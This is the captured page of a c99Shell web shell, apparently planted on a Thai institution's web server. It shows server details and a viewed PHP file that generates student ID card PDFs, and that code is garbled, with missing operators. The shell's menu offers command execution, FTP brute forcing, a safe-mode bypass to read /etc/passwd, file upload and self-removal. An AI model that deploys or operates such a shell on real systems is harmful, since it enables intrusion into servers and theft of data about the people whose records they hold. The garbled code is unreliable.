!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/views/eregis-13022565/   drwxrwxrwx
Free 51 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_rptRis10411.php (8.58 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
set_time_limit
(0);
ini_set("memory_limit","512M");
define('FPDF_FONTPATH',$this->config->item('path_application').'/font/');

$cfgClgLogo = (! isset($cfgClgLogo)? "" $cfgClgLogo);
$cfgClgName = (! isset($cfgClgName)? "" $cfgClgName);
$cfgSiteName = (! isset($cfgSiteName)? "" $cfgSiteName);
//-----------------------------------------------------------
class PDF extends FPDF {
    function 
Code39($xpos$ypos$code$baseline=0.5$height=5) {

        
$wide $baseline;
        
$narrow $baseline 
        
$gap $narrow;

        
$barChar['0'] = 'nnnwwnwnn';
        
$barChar['1'] = 'wnnwnnnnw';
        
$barChar['2'] = 'nnwwnnnnw';
        
$barChar['3'] = 'wnwwnnnnn';
        
$barChar['4'] = 'nnnwwnnnw';
        
$barChar['5'] = 'wnnwwnnnn';
        
$barChar['6'] = 'nnwwwnnnn';
        
$barChar['7'] = 'nnnwnnwnw';
        
$barChar['8'] = 'wnnwnnwnn';
        
$barChar['9'] = 'nnwwnnwnn';
        
$barChar['A'] = 'wnnnnwnnw';
        
$barChar['B'] = 'nnwnnwnnw';
        
$barChar['C'] = 'wnwnnwnnn';
        
$barChar['D'] = 'nnnnwwnnw';
        
$barChar['E'] = 'wnnnwwnnn';
        
$barChar['F'] = 'nnwnwwnnn';
        
$barChar['G'] = 'nnnnnwwnw';
        
$barChar['H'] = 'wnnnnwwnn';
        
$barChar['I'] = 'nnwnnwwnn';
        
$barChar['J'] = 'nnnnwwwnn';
        
$barChar['K'] = 'wnnnnnnww';
        
$barChar['L'] = 'nnwnnnnww';
        
$barChar['M'] = 'wnwnnnnwn';
        
$barChar['N'] = 'nnnnwnnww';
        
$barChar['O'] = 'wnnnwnnwn'
        
$barChar['P'] = 'nnwnwnnwn';
        
$barChar['Q'] = 'nnnnnnwww';
        
$barChar['R'] = 'wnnnnnwwn';
        
$barChar['S'] = 'nnwnnnwwn';
        
$barChar['T'] = 'nnnnwnwwn';
        
$barChar['U'] = 'wwnnnnnnw';
        
$barChar['V'] = 'nwwnnnnnw';
        
$barChar['W'] = 'wwwnnnnnn';
        
$barChar['X'] = 'nwnnwnnnw';
        
$barChar['Y'] = 'wwnnwnnnn';
        
$barChar['Z'] = 'nwwnwnnnn';
        
$barChar['-'] = 'nwnnnnwnw';
        
$barChar['.'] = 'wwnnnnwnn';
        
$barChar[' '] = 'nwwnnnwnn';
        
$barChar['*'] = 'nwnnwnwnn';
        
$barChar['$'] = 'nwnwnwnnn';
        
$barChar['/'] = 'nwnwnnnwn';
        
$barChar['+'] = 'nwnnnwnwn';
        
$barChar['%'] = 'nnnwnwnwn';

        
$this->SetFont('Arial','',10);
        
$this->Text($xpos$ypos $height 4$code);
        
$this->SetFillColor(0);

        
$code '*'.strtoupper($code).'*';
        for(
$i=0$i<strlen($code); $i++){
            
$char $code{$i};
            if(!isset(
$barChar[$char])){
                
$this->Error('Invalid character in barcode: '.$char);
            }
            
$seq $barChar[$char];
            for(
$bar=0$bar<9$bar++){
                if(
$seq{$bar} == 'n'){
                    
$lineWidth $narrow;
                }else{
                    
$lineWidth $wide;
                }
                if(
$bar == 0){
                    
$this->Rect($xpos$ypos$lineWidth$height'F');
                }
                
$xpos += $lineWidth;
            }
            
$xpos += $gap;
        }
    }
}
//Create new pdf file
$pdf=new PDF();

//Set thai font
$pdf->SetThaiFont();

$pdf->AliasNbPages();

//Open file
$pdf->Open();

//Disable automatic page break
$pdf->SetAutoPageBreak(false);

//Set margin page.
$pdf->SetLeftMargin(5);
$pdf->SetRightMargin(5);

//Add first page
$pdf->AddPage();
//-----------------------------------------------------------

//Set initial y axis position per page
//$y_axis_initial = 5;

//Set initial x position of table
//$x_axis_initial = 5;

//Set Row Height
//$row_height = 5;

// ****************************** No TypeSt ******************************
if(($typeSt=='N' && $startAdY && $endAdY) || ($typeSt=='Y' && $studentCode)) {

    
$cnt 0$y_xis 0;

    if(
$rs_std->num_rows()) {
        foreach(
$rs_std->result() as $row) {
            if(
$cnt!=&& ($cnt%4)==0) {
                
$pdf->AddPage();
                
$y_xis 0;
            }
    
        
/*$oSm->SearchByStCode($oSm0->studentCode);
        $oSm->GetRecord();
        $oPf->SearchByKey($oSm->prefixId);
        $oPf->GetRecord();
        $oSb->SearchByKey($oSm->studentId);
        $oSb->GetRecord();
        $oPg->SearchByKey($oSm->programId);
        $oPg->GetRecord();
        $oGe->SearchByKey($oSm->genNo);
        $oGe->GetRecord();*/

            //Frame
            
$pdf->SetY($y_xis+15);
            
$pdf->SetX(5);            
            
$pdf->Cell(94,55,'',1,0,'C');
            
//Logo
            
$pdf->Image(base_url().$this->config->item('rg_upload_picture').$cfgClgLogo,6,$y_xis+16,12,13);            
            
//Title
            
$pdf->SetY($y_xis+17);
            
$pdf->SetX(18);
            
$pdf->SetFont('AngsanaNew','B',10);
            
$pdf->Cell(55,5,iconv('UTF-8','CP874',$cfgClgName),0,0,'L');
            
$pdf->Ln(6);
            
$pdf->SetX(18);
            
$pdf->SetFontSize(9);
            
$pdf->Cell(55,5,iconv('UTF-8','CP874',$cfgClgNameE),0,0,'L');
            
//Draw line
            
$pdf->SetLineWidth(0.3);
            
$pdf->Line(7,$y_xis+30,75,$y_xis+30);
            
//Picture
            
$pdf->SetY($y_xis+16);
            
$pdf->SetX(77);
            
//if(file_exists(base_url().$this->config->item('rg_pictureStd').$row->sdtPicturePath)) {
            
            
if($row->sdtPicturePath!=NULL) {
                if(
file_exists($this->config->item('rg_upload_pictureStd').$row->sdtPicturePath)) {
                    
                    
$pdf->Cell(21,25,'',1,0,'C');
                    
$pdf->Image(base_url().$this->config->item('rg_pictureStd').$row->sdtPicturePath,78,$y_xis+17,19,23);
                } else {
                    
$pdf->Cell(21,25,'ไม่พบรูป',1,0,'C');
                }
            } else{
                
$pdf->Cell(21,25,'ไม่พบรูป',1,0,'C');
            }

            
$pdf->SetY($y_xis+35);
            
$pdf->SetX(6);
            
$pdf->SetFontSize(12);
            
$pdf->Cell(16,5,'รหัสนักศึกษา ',0,0,'L');
            
$pdf->SetFont('');
            
$pdf->Cell(34,5,$row->stdCode,0,0,'L');
            
$pdf->SetFont('AngsanaNew','B');
            
$pdf->Cell(12,5,'หมู่เลือด ',0,0,'L');
            
$pdf->SetFont('');
            
$pdf->Cell(58,5,$row->sdtBloodGroup,0,0,'L');
            
$pdf->Ln(6);
            
$pdf->SetX(6);
            
$pdf->SetFont('AngsanaNew','B');
            
$pdf->Cell(16,5,'ชื่อ-นามสกุล ',0,0,'L');
            
$pdf->SetFont('');
            
$pdf->Cell(54,5,iconv('UTF-8','CP874',$row->prefixName.$row->stdName.' '.$row->stdSurname),0,0,'L');
            
$pdf->Ln(6);
            
$pdf->SetX(6);
            
$pdf->SetFont('AngsanaNew','B');
            
$pdf->Cell(12,5,'หลักสูตร ',0,0,'L');
            
$pdf->SetFont('AngsanaNew','',10);
            
$tmpPgName explode('^'$row->curName );
            if(
count($tmpPgName) == 1)
                
$pdf->Cell(80,5,iconv('UTF-8','CP874',$tmpPgName[0]).' รุ่น '.iconv('UTF-8','CP874',$row->genNo),0,0,'L');
            else {
                
$pdf->Cell(80,5,iconv('UTF-8','CP874',$tmpPgName[0]),0,0,'L');
                
$pdf->Ln(6);
                
$pdf->SetX(18);
                
$pdf->Cell(80,5,iconv('UTF-8','CP874',$tmpPgName[1]).' รุ่น '.iconv('UTF-8','CP874',$row->genNo),0,0,'L');
            }

            
$pdf->SetY($y_xis+60);
            
$pdf->SetX(6);
            
$pdf->Cell(46,5,'........................................',0,0,'C');
            
$pdf->Cell(46,5,'........................................',0,0,'C');
            
$pdf->Ln(4);
            
$pdf->SetX(6);
            
$pdf->SetFont('AngsanaNew','B');
            
$pdf->Cell(46,5,'ลายมือชื่อ',0,0,'C');
            
$pdf->Cell(46,5,iconv('UTF-8','CP874',$directorPos),0,0,'C');

            
//Frame
            
$pdf->SetY($y_xis+15);
            
$pdf->SetX(110);
            
$pdf->Cell(94,55,'',1,0,'C');
            
//Barcode
            
$pdf->Code39(119,$y_xis+19,$row->stdCode,1.2,8);
            
//Logo
            
$pdf->Image(base_url().$this->config->item('rg_upload_picture').$cfgInstituteLogo,111.5,$y_xis+38,12,12);
            
//Title
            
$pdf->SetY($y_xis+38);
            
$pdf->SetX(123);
            
$pdf->SetFont('AngsanaNew','B',10);
            
$pdf->Cell(0,5,iconv('UTF-8','CP874',$cfgInstitute.' '.$cfgMinistry),0,0,'L');
            
$pdf->Ln(6);
            
$pdf->SetX(123);
            
//$pdf->Cell(0,5,$cfgInstituteE.' '.$cfgMinistryE,0,0,'L');  // ของเดิม

            // --------------- ของใหม่
            
$pdf->Cell(0,5,$cfgInstituteE,0,0,'L');
            
$pdf->Ln(6);
            
$pdf->SetX(123);
            
$pdf->Cell(0,5,$cfgMinistryE,0,0,'L');
            
// ---------------

            //Draw line
            
$pdf->Line(112,$y_xis+57,202,$y_xis+57);

            
$pdf->SetY($y_xis+59);
            
$pdf->SetX(112);
            
$pdf->SetFont('AngsanaNew','',12);
            
$pdf->Cell(45,5,iconv('UTF-8','CP874',abbreDate($cardIssuedDate)),0,0,'C');

            if (
$typeSt=='Y') { // รายนักศึกษา
                
$pdf->Cell(0,5,iconv('UTF-8','CP874',abbreDate($cardExpiryDate)),0,0,'C');
            } else { 
// รายกลุ่ม
                
$pdf->Cell(0,5,iconv('UTF-8','CP874',abbreDate($acCardExpiryDay.'-'.$acCardExpiryMonth.'-'.intval($row->stdAdY+$row->curNumStudyY-543))),0,0,'C');
            }
            
$pdf->Ln(5);
            
$pdf->SetX(112);
            
$pdf->SetFont('AngsanaNew','B');
            
$pdf->Cell(45,5,'วันออกบัตร ',0,0,'C');
            
$pdf->Cell(0,5,'วันหมดอายุ ',0,0,'C');

            
$y_xis $y_xis 70;
            
$cnt++;
        }
        
//Create file
        
$pdf->Output();
    } else {
?>
    <meta http-equiv="Content-Type" content="text/html; charset=tis-620" />
    <table align="center">
        <tr>
            <td align="center"><font face="Microsoft Sans Serif" size="2" color="<?php echo $font_color_err;?>">** ไม่พบข้อมูลที่ต้องการค้นหา **<br>
<?php
            
echo anchor($this->config->item("rg_folder")."rpt_student/searchRptRis104",'[ปิดหน้านี้]');
?>
            </font></td>
        </tr>
    </table>
<?
    
}
}
else {
?>     
    <meta http-equiv="Content-Type" content="text/html; charset=tis-620" />
    <table align="center">
        <tr>
            <td align="center"><font face="Microsoft Sans Serif" size="2" color="<?php echo $font_color_err;?>">** เงื่อนไขในการค้นหาไม่ถูกต้อง **<br>
            <a href="#" onClick="window.close()">[ปิดหน้านี้]</a></font></td>
        </tr>
    </table>
<?php
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0113 ]--